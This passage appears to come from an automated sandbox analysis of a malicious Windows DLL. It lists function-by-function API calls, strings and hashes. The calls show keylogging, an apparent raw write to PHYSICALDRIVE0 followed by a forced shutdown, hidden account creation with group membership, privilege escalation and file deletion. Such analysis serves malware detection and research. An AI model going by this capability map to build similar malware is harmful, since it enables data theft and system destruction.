                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongWindow$ClassDestroyHandleIconLoadMessageModulePostQuit
                                                          • String ID: %s %d/%d/%d %d:%02d:%02d %s
                                                          • API String ID: 3894596752-2160474225
                                                          • Opcode ID: 1904ecbfdee7d611a030658981fe37c0d0122d5446e29a64de195553bc9f444d
                                                          • Instruction ID: 439356ab79706b28f2f9ca069669659c2d6bf2d32ef7ce3fd9937e9eb7b6a6bc
                                                          • Opcode Fuzzy Hash: 1904ecbfdee7d611a030658981fe37c0d0122d5446e29a64de195553bc9f444d
                                                          • Instruction Fuzzy Hash: CE5122765046166FF321CB28CCC5FEB77ACFF48351F084635FA4AD21C2CA6DA9098661
                                                          Function 1002AB10 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 205stringfilememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,?), ref: 1002AB66
                                                          • lstrcatA.KERNEL32(00000000,\*.*), ref: 1002AB75
                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 1002AB91
                                                          • strstr.MSVCRT ref: 1002AC63
                                                          • GetPrivateProfileStringA.KERNEL32(InternetShortcut,URL,1012B044,?,00000104,?), ref: 1002ACB3
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002ACBD
                                                          • lstrlenA.KERNEL32(?), ref: 1002ACC6
                                                          • LocalSize.KERNEL32(?), ref: 1002ACDC
                                                          • LocalReAlloc.KERNEL32(?,-00000400,00000042), ref: 1002ACF5
                                                          • lstrlenA.KERNEL32(?), ref: 1002AD05
                                                          • lstrlenA.KERNEL32(?), ref: 1002AD2F
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002AD49
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002AD79
                                                          • FindNextFileA.KERNEL32(?,?), ref: 1002AD95
                                                          • FindClose.KERNEL32(?), ref: 1002ADA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Find$FileLocallstrcat$AllocCloseFirstNextPrivateProfileSizeStringstrstr
                                                          • String ID: .$.url$InternetShortcut$URL$\*.*
                                                          • API String ID: 3365753205-65308377
                                                          • Opcode ID: 23a19cf4749a79bd38d03e3b07e7f2be74737afd946fab1e6ba4d09cd67840df
                                                          • Instruction ID: 01225bb2abe30c27f4baf0a4e6b0b3de23dc1d41b29693e4ad67a7c63e454342
                                                          • Opcode Fuzzy Hash: 23a19cf4749a79bd38d03e3b07e7f2be74737afd946fab1e6ba4d09cd67840df
                                                          • Instruction Fuzzy Hash: 806105352046449FC729CB28CC85AEBB7E6FBC4305F544B1DFA4AA3291DF78A90AC741
                                                          Function 100092A0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 119filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,?,?,00000000,00000065), ref: 100092C6
                                                          • wsprintfA.USER32 ref: 1000931C
                                                          • FindFirstFileA.KERNEL32(?,?,100FA614,?,00000000,00000065), ref: 1000932E
                                                          • wsprintfA.USER32 ref: 10009390
                                                          • wsprintfA.USER32 ref: 100093BC
                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 100093D6
                                                          • DeleteFileA.KERNEL32(?), ref: 100093E4
                                                          • FindNextFileA.KERNEL32(?,?), ref: 100093F4
                                                          • FindClose.KERNEL32(?), ref: 10009407
                                                          • RemoveDirectoryA.KERNEL32(?), ref: 1000940E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Findwsprintf$AttributesCloseDeleteDirectoryFirstNextRemovelstrlen
                                                          • String ID: %$%$%$%$%$.$.
                                                          • API String ID: 1639472542-2249276185
                                                          • Opcode ID: 5b6e6152956aa3aa1583c1ec0d93a6a96c4927921946a9250eb426886467527d
                                                          • Instruction ID: 8a00a536bbcf0f339130e2cb173a01ba14998b4175500a8bb64526298c27287d
                                                          • Opcode Fuzzy Hash: 5b6e6152956aa3aa1583c1ec0d93a6a96c4927921946a9250eb426886467527d
                                                          • Instruction Fuzzy Hash: EF417F7100D3C19AE711CB64DC48AEBBBE8EBD6344F084A5DF5C893281D6799608C76B
                                                          Function 1001A420 Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 331COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindWindowA.USER32(?,00000000), ref: 1001A481
                                                          • GetWindowTextA.USER32(00000000,771B32F0,00000104), ref: 1001A4DC
                                                          • GetWindow.USER32(00000000,00000002), ref: 1001A586
                                                          • GetClassNameA.USER32(00000000,771B32F0,00000104), ref: 1001A595
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001A5A4
                                                          • wsprintfA.USER32 ref: 1001A619
                                                          • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\Destop.ini,?,00000001), ref: 1001A6C7
                                                          • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\De.ini,?,00000001), ref: 1001A73B
                                                          • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\id.ini,?,00000001), ref: 1001A774
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFileWindow$ClassCloseFindHandleNameTextwsprintf
                                                          • String ID: %s $C:\ProgramData\Microsoft Drive\De.ini$C:\ProgramData\Microsoft Drive\Destop.ini$C:\ProgramData\Microsoft Drive\id.ini$CTXOPConntion_Class$qq.exe
                                                          • API String ID: 2156150844-4244366814
                                                          • Opcode ID: 2fab3d79b7c153194fb415c13bdb1816867f672efe220bb48b777d481ba05164
                                                          • Instruction ID: 6e49010710ea7cfde4e70a8d4c07c6d928d78a403e4cb6ea405f1795ec133dc1
                                                          • Opcode Fuzzy Hash: 2fab3d79b7c153194fb415c13bdb1816867f672efe220bb48b777d481ba05164
                                                          • Instruction Fuzzy Hash: EC910836614A080BC72CC57858656AB76C3EBC5370FA9473DFA6BDB2D1DEB8CD498240
                                                          Function 10008E50 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 162stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 10008E7D
                                                          • GetUserNameA.ADVAPI32(?,?), ref: 10008EA9
                                                          • _strcmpi.MSVCRT ref: 10008EBC
                                                          • SHGetFolderPathA.SHELL32(00000000,00000010,00000000,00000000,?), ref: 10008EE7
                                                          • CloseHandle.KERNEL32(00000000), ref: 10008EEE
                                                          • lstrlenA.KERNEL32(?), ref: 10008F02
                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 10008F3D
                                                          • SHGetFileInfoA.SHELL32(?,00000080,?,00000160,00000410), ref: 10008F5B
                                                          • lstrlenA.KERNEL32(?), ref: 10008F69
                                                          • lstrlenA.KERNEL32(?), ref: 10008F77
                                                          • GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 10008F96
                                                          • GetDriveTypeA.KERNEL32(?), ref: 10008FDD
                                                          • lstrlenA.KERNEL32(?), ref: 10009047
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Drive$CloseDiskFileFolderFreeHandleInfoInformationLogicalNamePathSpaceStringsTypeUserVolume_strcmpi
                                                          • String ID: SYSTEM$g
                                                          • API String ID: 545482129-3120117691
                                                          • Opcode ID: df723ad6942873d95c7a4638fbedeeb3016da053a09685ffa93ad8dbc41845db
                                                          • Instruction ID: c8429926c63601f6ea7d8031317dae8df0805160766070a83ab6d3e18fb45688
                                                          • Opcode Fuzzy Hash: df723ad6942873d95c7a4638fbedeeb3016da053a09685ffa93ad8dbc41845db
                                                          • Instruction Fuzzy Hash: 6B5180715083499FD710DF24C880AEBBBE9FBC8344F444A2DFA8997251D770AA09CB66
                                                          Function 100254C0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 193stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 10025511
                                                          • wcstombs.MSVCRT ref: 10025552
                                                          • NetApiBufferFree.NETAPI32(000000FF,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 1002556E
                                                          • NetApiBufferFree.NETAPI32(000000FF,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 1002558A
                                                          • LocalAlloc.KERNEL32(00000040,00000400,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 100255AB
                                                          • lstrlenA.KERNEL32(1012C810), ref: 1002561B
                                                          • lstrlenA.KERNEL32(1012C810), ref: 1002563C
                                                          • lstrlenA.KERNEL32(?), ref: 1002564F
                                                          • lstrlenA.KERNEL32(?), ref: 10025671
                                                          • lstrlenA.KERNEL32(?), ref: 10025684
                                                          • lstrlenA.KERNEL32(?), ref: 100256A2
                                                          • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 100256D6
                                                            • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                            • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                            • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                            • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$AllocBufferFreeLocalProcessToken$AdjustCloseCurrentEnumErrorHandleLastLookupOpenPrivilegePrivilegesUserValuewcstombs
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2919970077-2896544425
                                                          • Opcode ID: 57ba478f972288fdc5cd98b659e85f394b7f9fefe69c57ff74ae41dcb225ed5b
                                                          • Instruction ID: 6354d9cbaf3505665796eca170beba6c0c811d8fb8498e00f335d9833f977874
                                                          • Opcode Fuzzy Hash: 57ba478f972288fdc5cd98b659e85f394b7f9fefe69c57ff74ae41dcb225ed5b
                                                          • Instruction Fuzzy Hash: EA51D2716047159BC304DF18DC819AFB7E5FBC8700F84491DF686A7241DB75E90ACBA6
                                                          Function 1000B840 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 156keyboardsleepstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(0000000A), ref: 1000B8A6
                                                          • lstrlenA.KERNEL32(?), ref: 1000B8B1
                                                          • GetKeyState.USER32(00000010), ref: 1000B8FB
                                                          • GetAsyncKeyState.USER32(0000000D), ref: 1000B907
                                                          • GetKeyState.USER32(00000014), ref: 1000B914
                                                          • GetKeyState.USER32(00000014), ref: 1000B93C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$AsyncSleeplstrlen
                                                          • String ID: <BackSpace>$<Enter>
                                                          • API String ID: 43598291-3792472884
                                                          • Opcode ID: 600104d3a6fed73dbf7a32e2fc48a2a7b55119f13c72bea2c34559d00484d6f4
                                                          • Instruction ID: 254073e1c1d6b0a9fa3052202c61483a4731d11cdb8d0cac1f822bb488184c88
                                                          • Opcode Fuzzy Hash: 600104d3a6fed73dbf7a32e2fc48a2a7b55119f13c72bea2c34559d00484d6f4
                                                          • Instruction Fuzzy Hash: C3510471508B86ABF710DF64CC847AF73E9EB82384F010E2DEA5192194DB35D949C753
                                                          Function 1000E670 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 82filesleepshutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNEL32 ref: 1000E6D2
                                                          • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E705
                                                          • WriteFile.KERNEL32(00000000,00000000,00000200,00000000,00000000), ref: 1000E719
                                                          • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E734
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000E737
                                                          • Sleep.KERNEL32(000007D0), ref: 1000E742
                                                          • GetVersion.KERNEL32 ref: 1000E748
                                                          • ExitWindowsEx.USER32(00000006,00000000), ref: 1000E768
                                                          • ExitProcess.KERNEL32 ref: 1000E770
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$ControlDeviceExitFile$CloseCreateCurrentHandleOpenSleepTokenVersionWindowsWrite
                                                          • String ID: SeShutdownPrivilege$U$\\.\PHYSICALDRIVE0
                                                          • API String ID: 554375110-3993181469
                                                          • Opcode ID: 0afe2ad8e16ea5edbc017d365728db05ca0ba4cd117a679420f1a44199d0639f
                                                          • Instruction ID: f74105865133530c9c42a2179fda12015e9b4dafff81d6fb0ebd67d8a36456bb
                                                          • Opcode Fuzzy Hash: 0afe2ad8e16ea5edbc017d365728db05ca0ba4cd117a679420f1a44199d0639f
                                                          • Instruction Fuzzy Hash: BE210735284751BBF230EB64DC4AFDB3B94BB84B10F240614FB697E1D0DAA465048B6A
                                                          Function 10009080 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 175filememorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,?,?,00000065), ref: 100090AA
                                                          • wsprintfA.USER32 ref: 100090FA
                                                          • FindFirstFileA.KERNEL32(?,?,?,100FA614,?,00000065), ref: 10009110
                                                          • LocalAlloc.KERNEL32(00000040,00002800,00000000,?,00000065), ref: 10009146
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042,?,00000065), ref: 10009174
                                                          • lstrlenA.KERNEL32(?,?,00000065), ref: 10009203
                                                          • FindNextFileA.KERNEL32(?,?,?,00000065), ref: 10009256
                                                          • LocalFree.KERNEL32(00000000,?,00000065), ref: 10009272
                                                          • FindClose.KERNEL32(?,?,00000065), ref: 1000927D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindLocal$AllocFilelstrlen$CloseFirstFreeNextwsprintf
                                                          • String ID: .$h
                                                          • API String ID: 4283800025-2131999284
                                                          • Opcode ID: 3d4794a39b754fa284c176265fc0d8f280d752618cf25aabed4a2790a94c1acf
                                                          • Instruction ID: 429df1e4e3a9b0687acd726eb786cb4cdb3391103595e477c9a2abab359b95e6
                                                          • Opcode Fuzzy Hash: 3d4794a39b754fa284c176265fc0d8f280d752618cf25aabed4a2790a94c1acf
                                                          • Instruction Fuzzy Hash: 2951287560C3829BE710CF289C84ADBBBE5EF99384F144A58F8D897381D279990DC762
                                                          Function 10025AA0 Relevance: 18.1, APIs: 12, Instructions: 126stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000), ref: 10025AC9
                                                          • lstrlenA.KERNEL32(00000000), ref: 10025AD9
                                                          • lstrlenA.KERNEL32(00000000), ref: 10025AE2
                                                            • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 10024614
                                                            • Part of subcall function 100245F0: #823.MFC42(00000002,?,00000000,00000000), ref: 10024621
                                                            • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002463D
                                                          • NetUserAdd.NETAPI32 ref: 10025B38
                                                          • #825.MFC42(?), ref: 10025B46
                                                          • #825.MFC42(?,?), ref: 10025B50
                                                          • wcscpy.MSVCRT ref: 10025B94
                                                          • #825.MFC42(?), ref: 10025B9F
                                                          • #825.MFC42(?,?), ref: 10025BA9
                                                          • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,?,00000001,?,00000000,00000001,?,?), ref: 10025BCC
                                                          • #825.MFC42(00000000,00000000,00000000,00000003,?,00000001,?,00000000,00000001,?,?), ref: 10025BD4
                                                          • LocalFree.KERNEL32(?,00000001,?,00000000,00000001,?,?), ref: 10025C05
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #825$lstrlen$ByteCharLocalMultiWide$#823FreeGroupMembersUserwcscpy
                                                          • String ID:
                                                          • API String ID: 3899135135-0
                                                          • Opcode ID: 845040a6a147bf0244a5e108915e50923d3870f156928ecec06d720133b77a1b
                                                          • Instruction ID: dd9d3f93371bab7a31d82c422f9be74c5db956489815e8898b81c9b0b0312487
                                                          • Opcode Fuzzy Hash: 845040a6a147bf0244a5e108915e50923d3870f156928ecec06d720133b77a1b
                                                          • Instruction Fuzzy Hash: 7D41B4B56083046BD710DB74DC81EAFB7ECEFC4704F44092DF58497242EAB9E9498B62
                                                          Function 1000ED10 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 61processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1002C6A0: LoadLibraryA.KERNEL32 ref: 1002C6B7
                                                            • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1002C6C7
                                                            • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1002C6D1
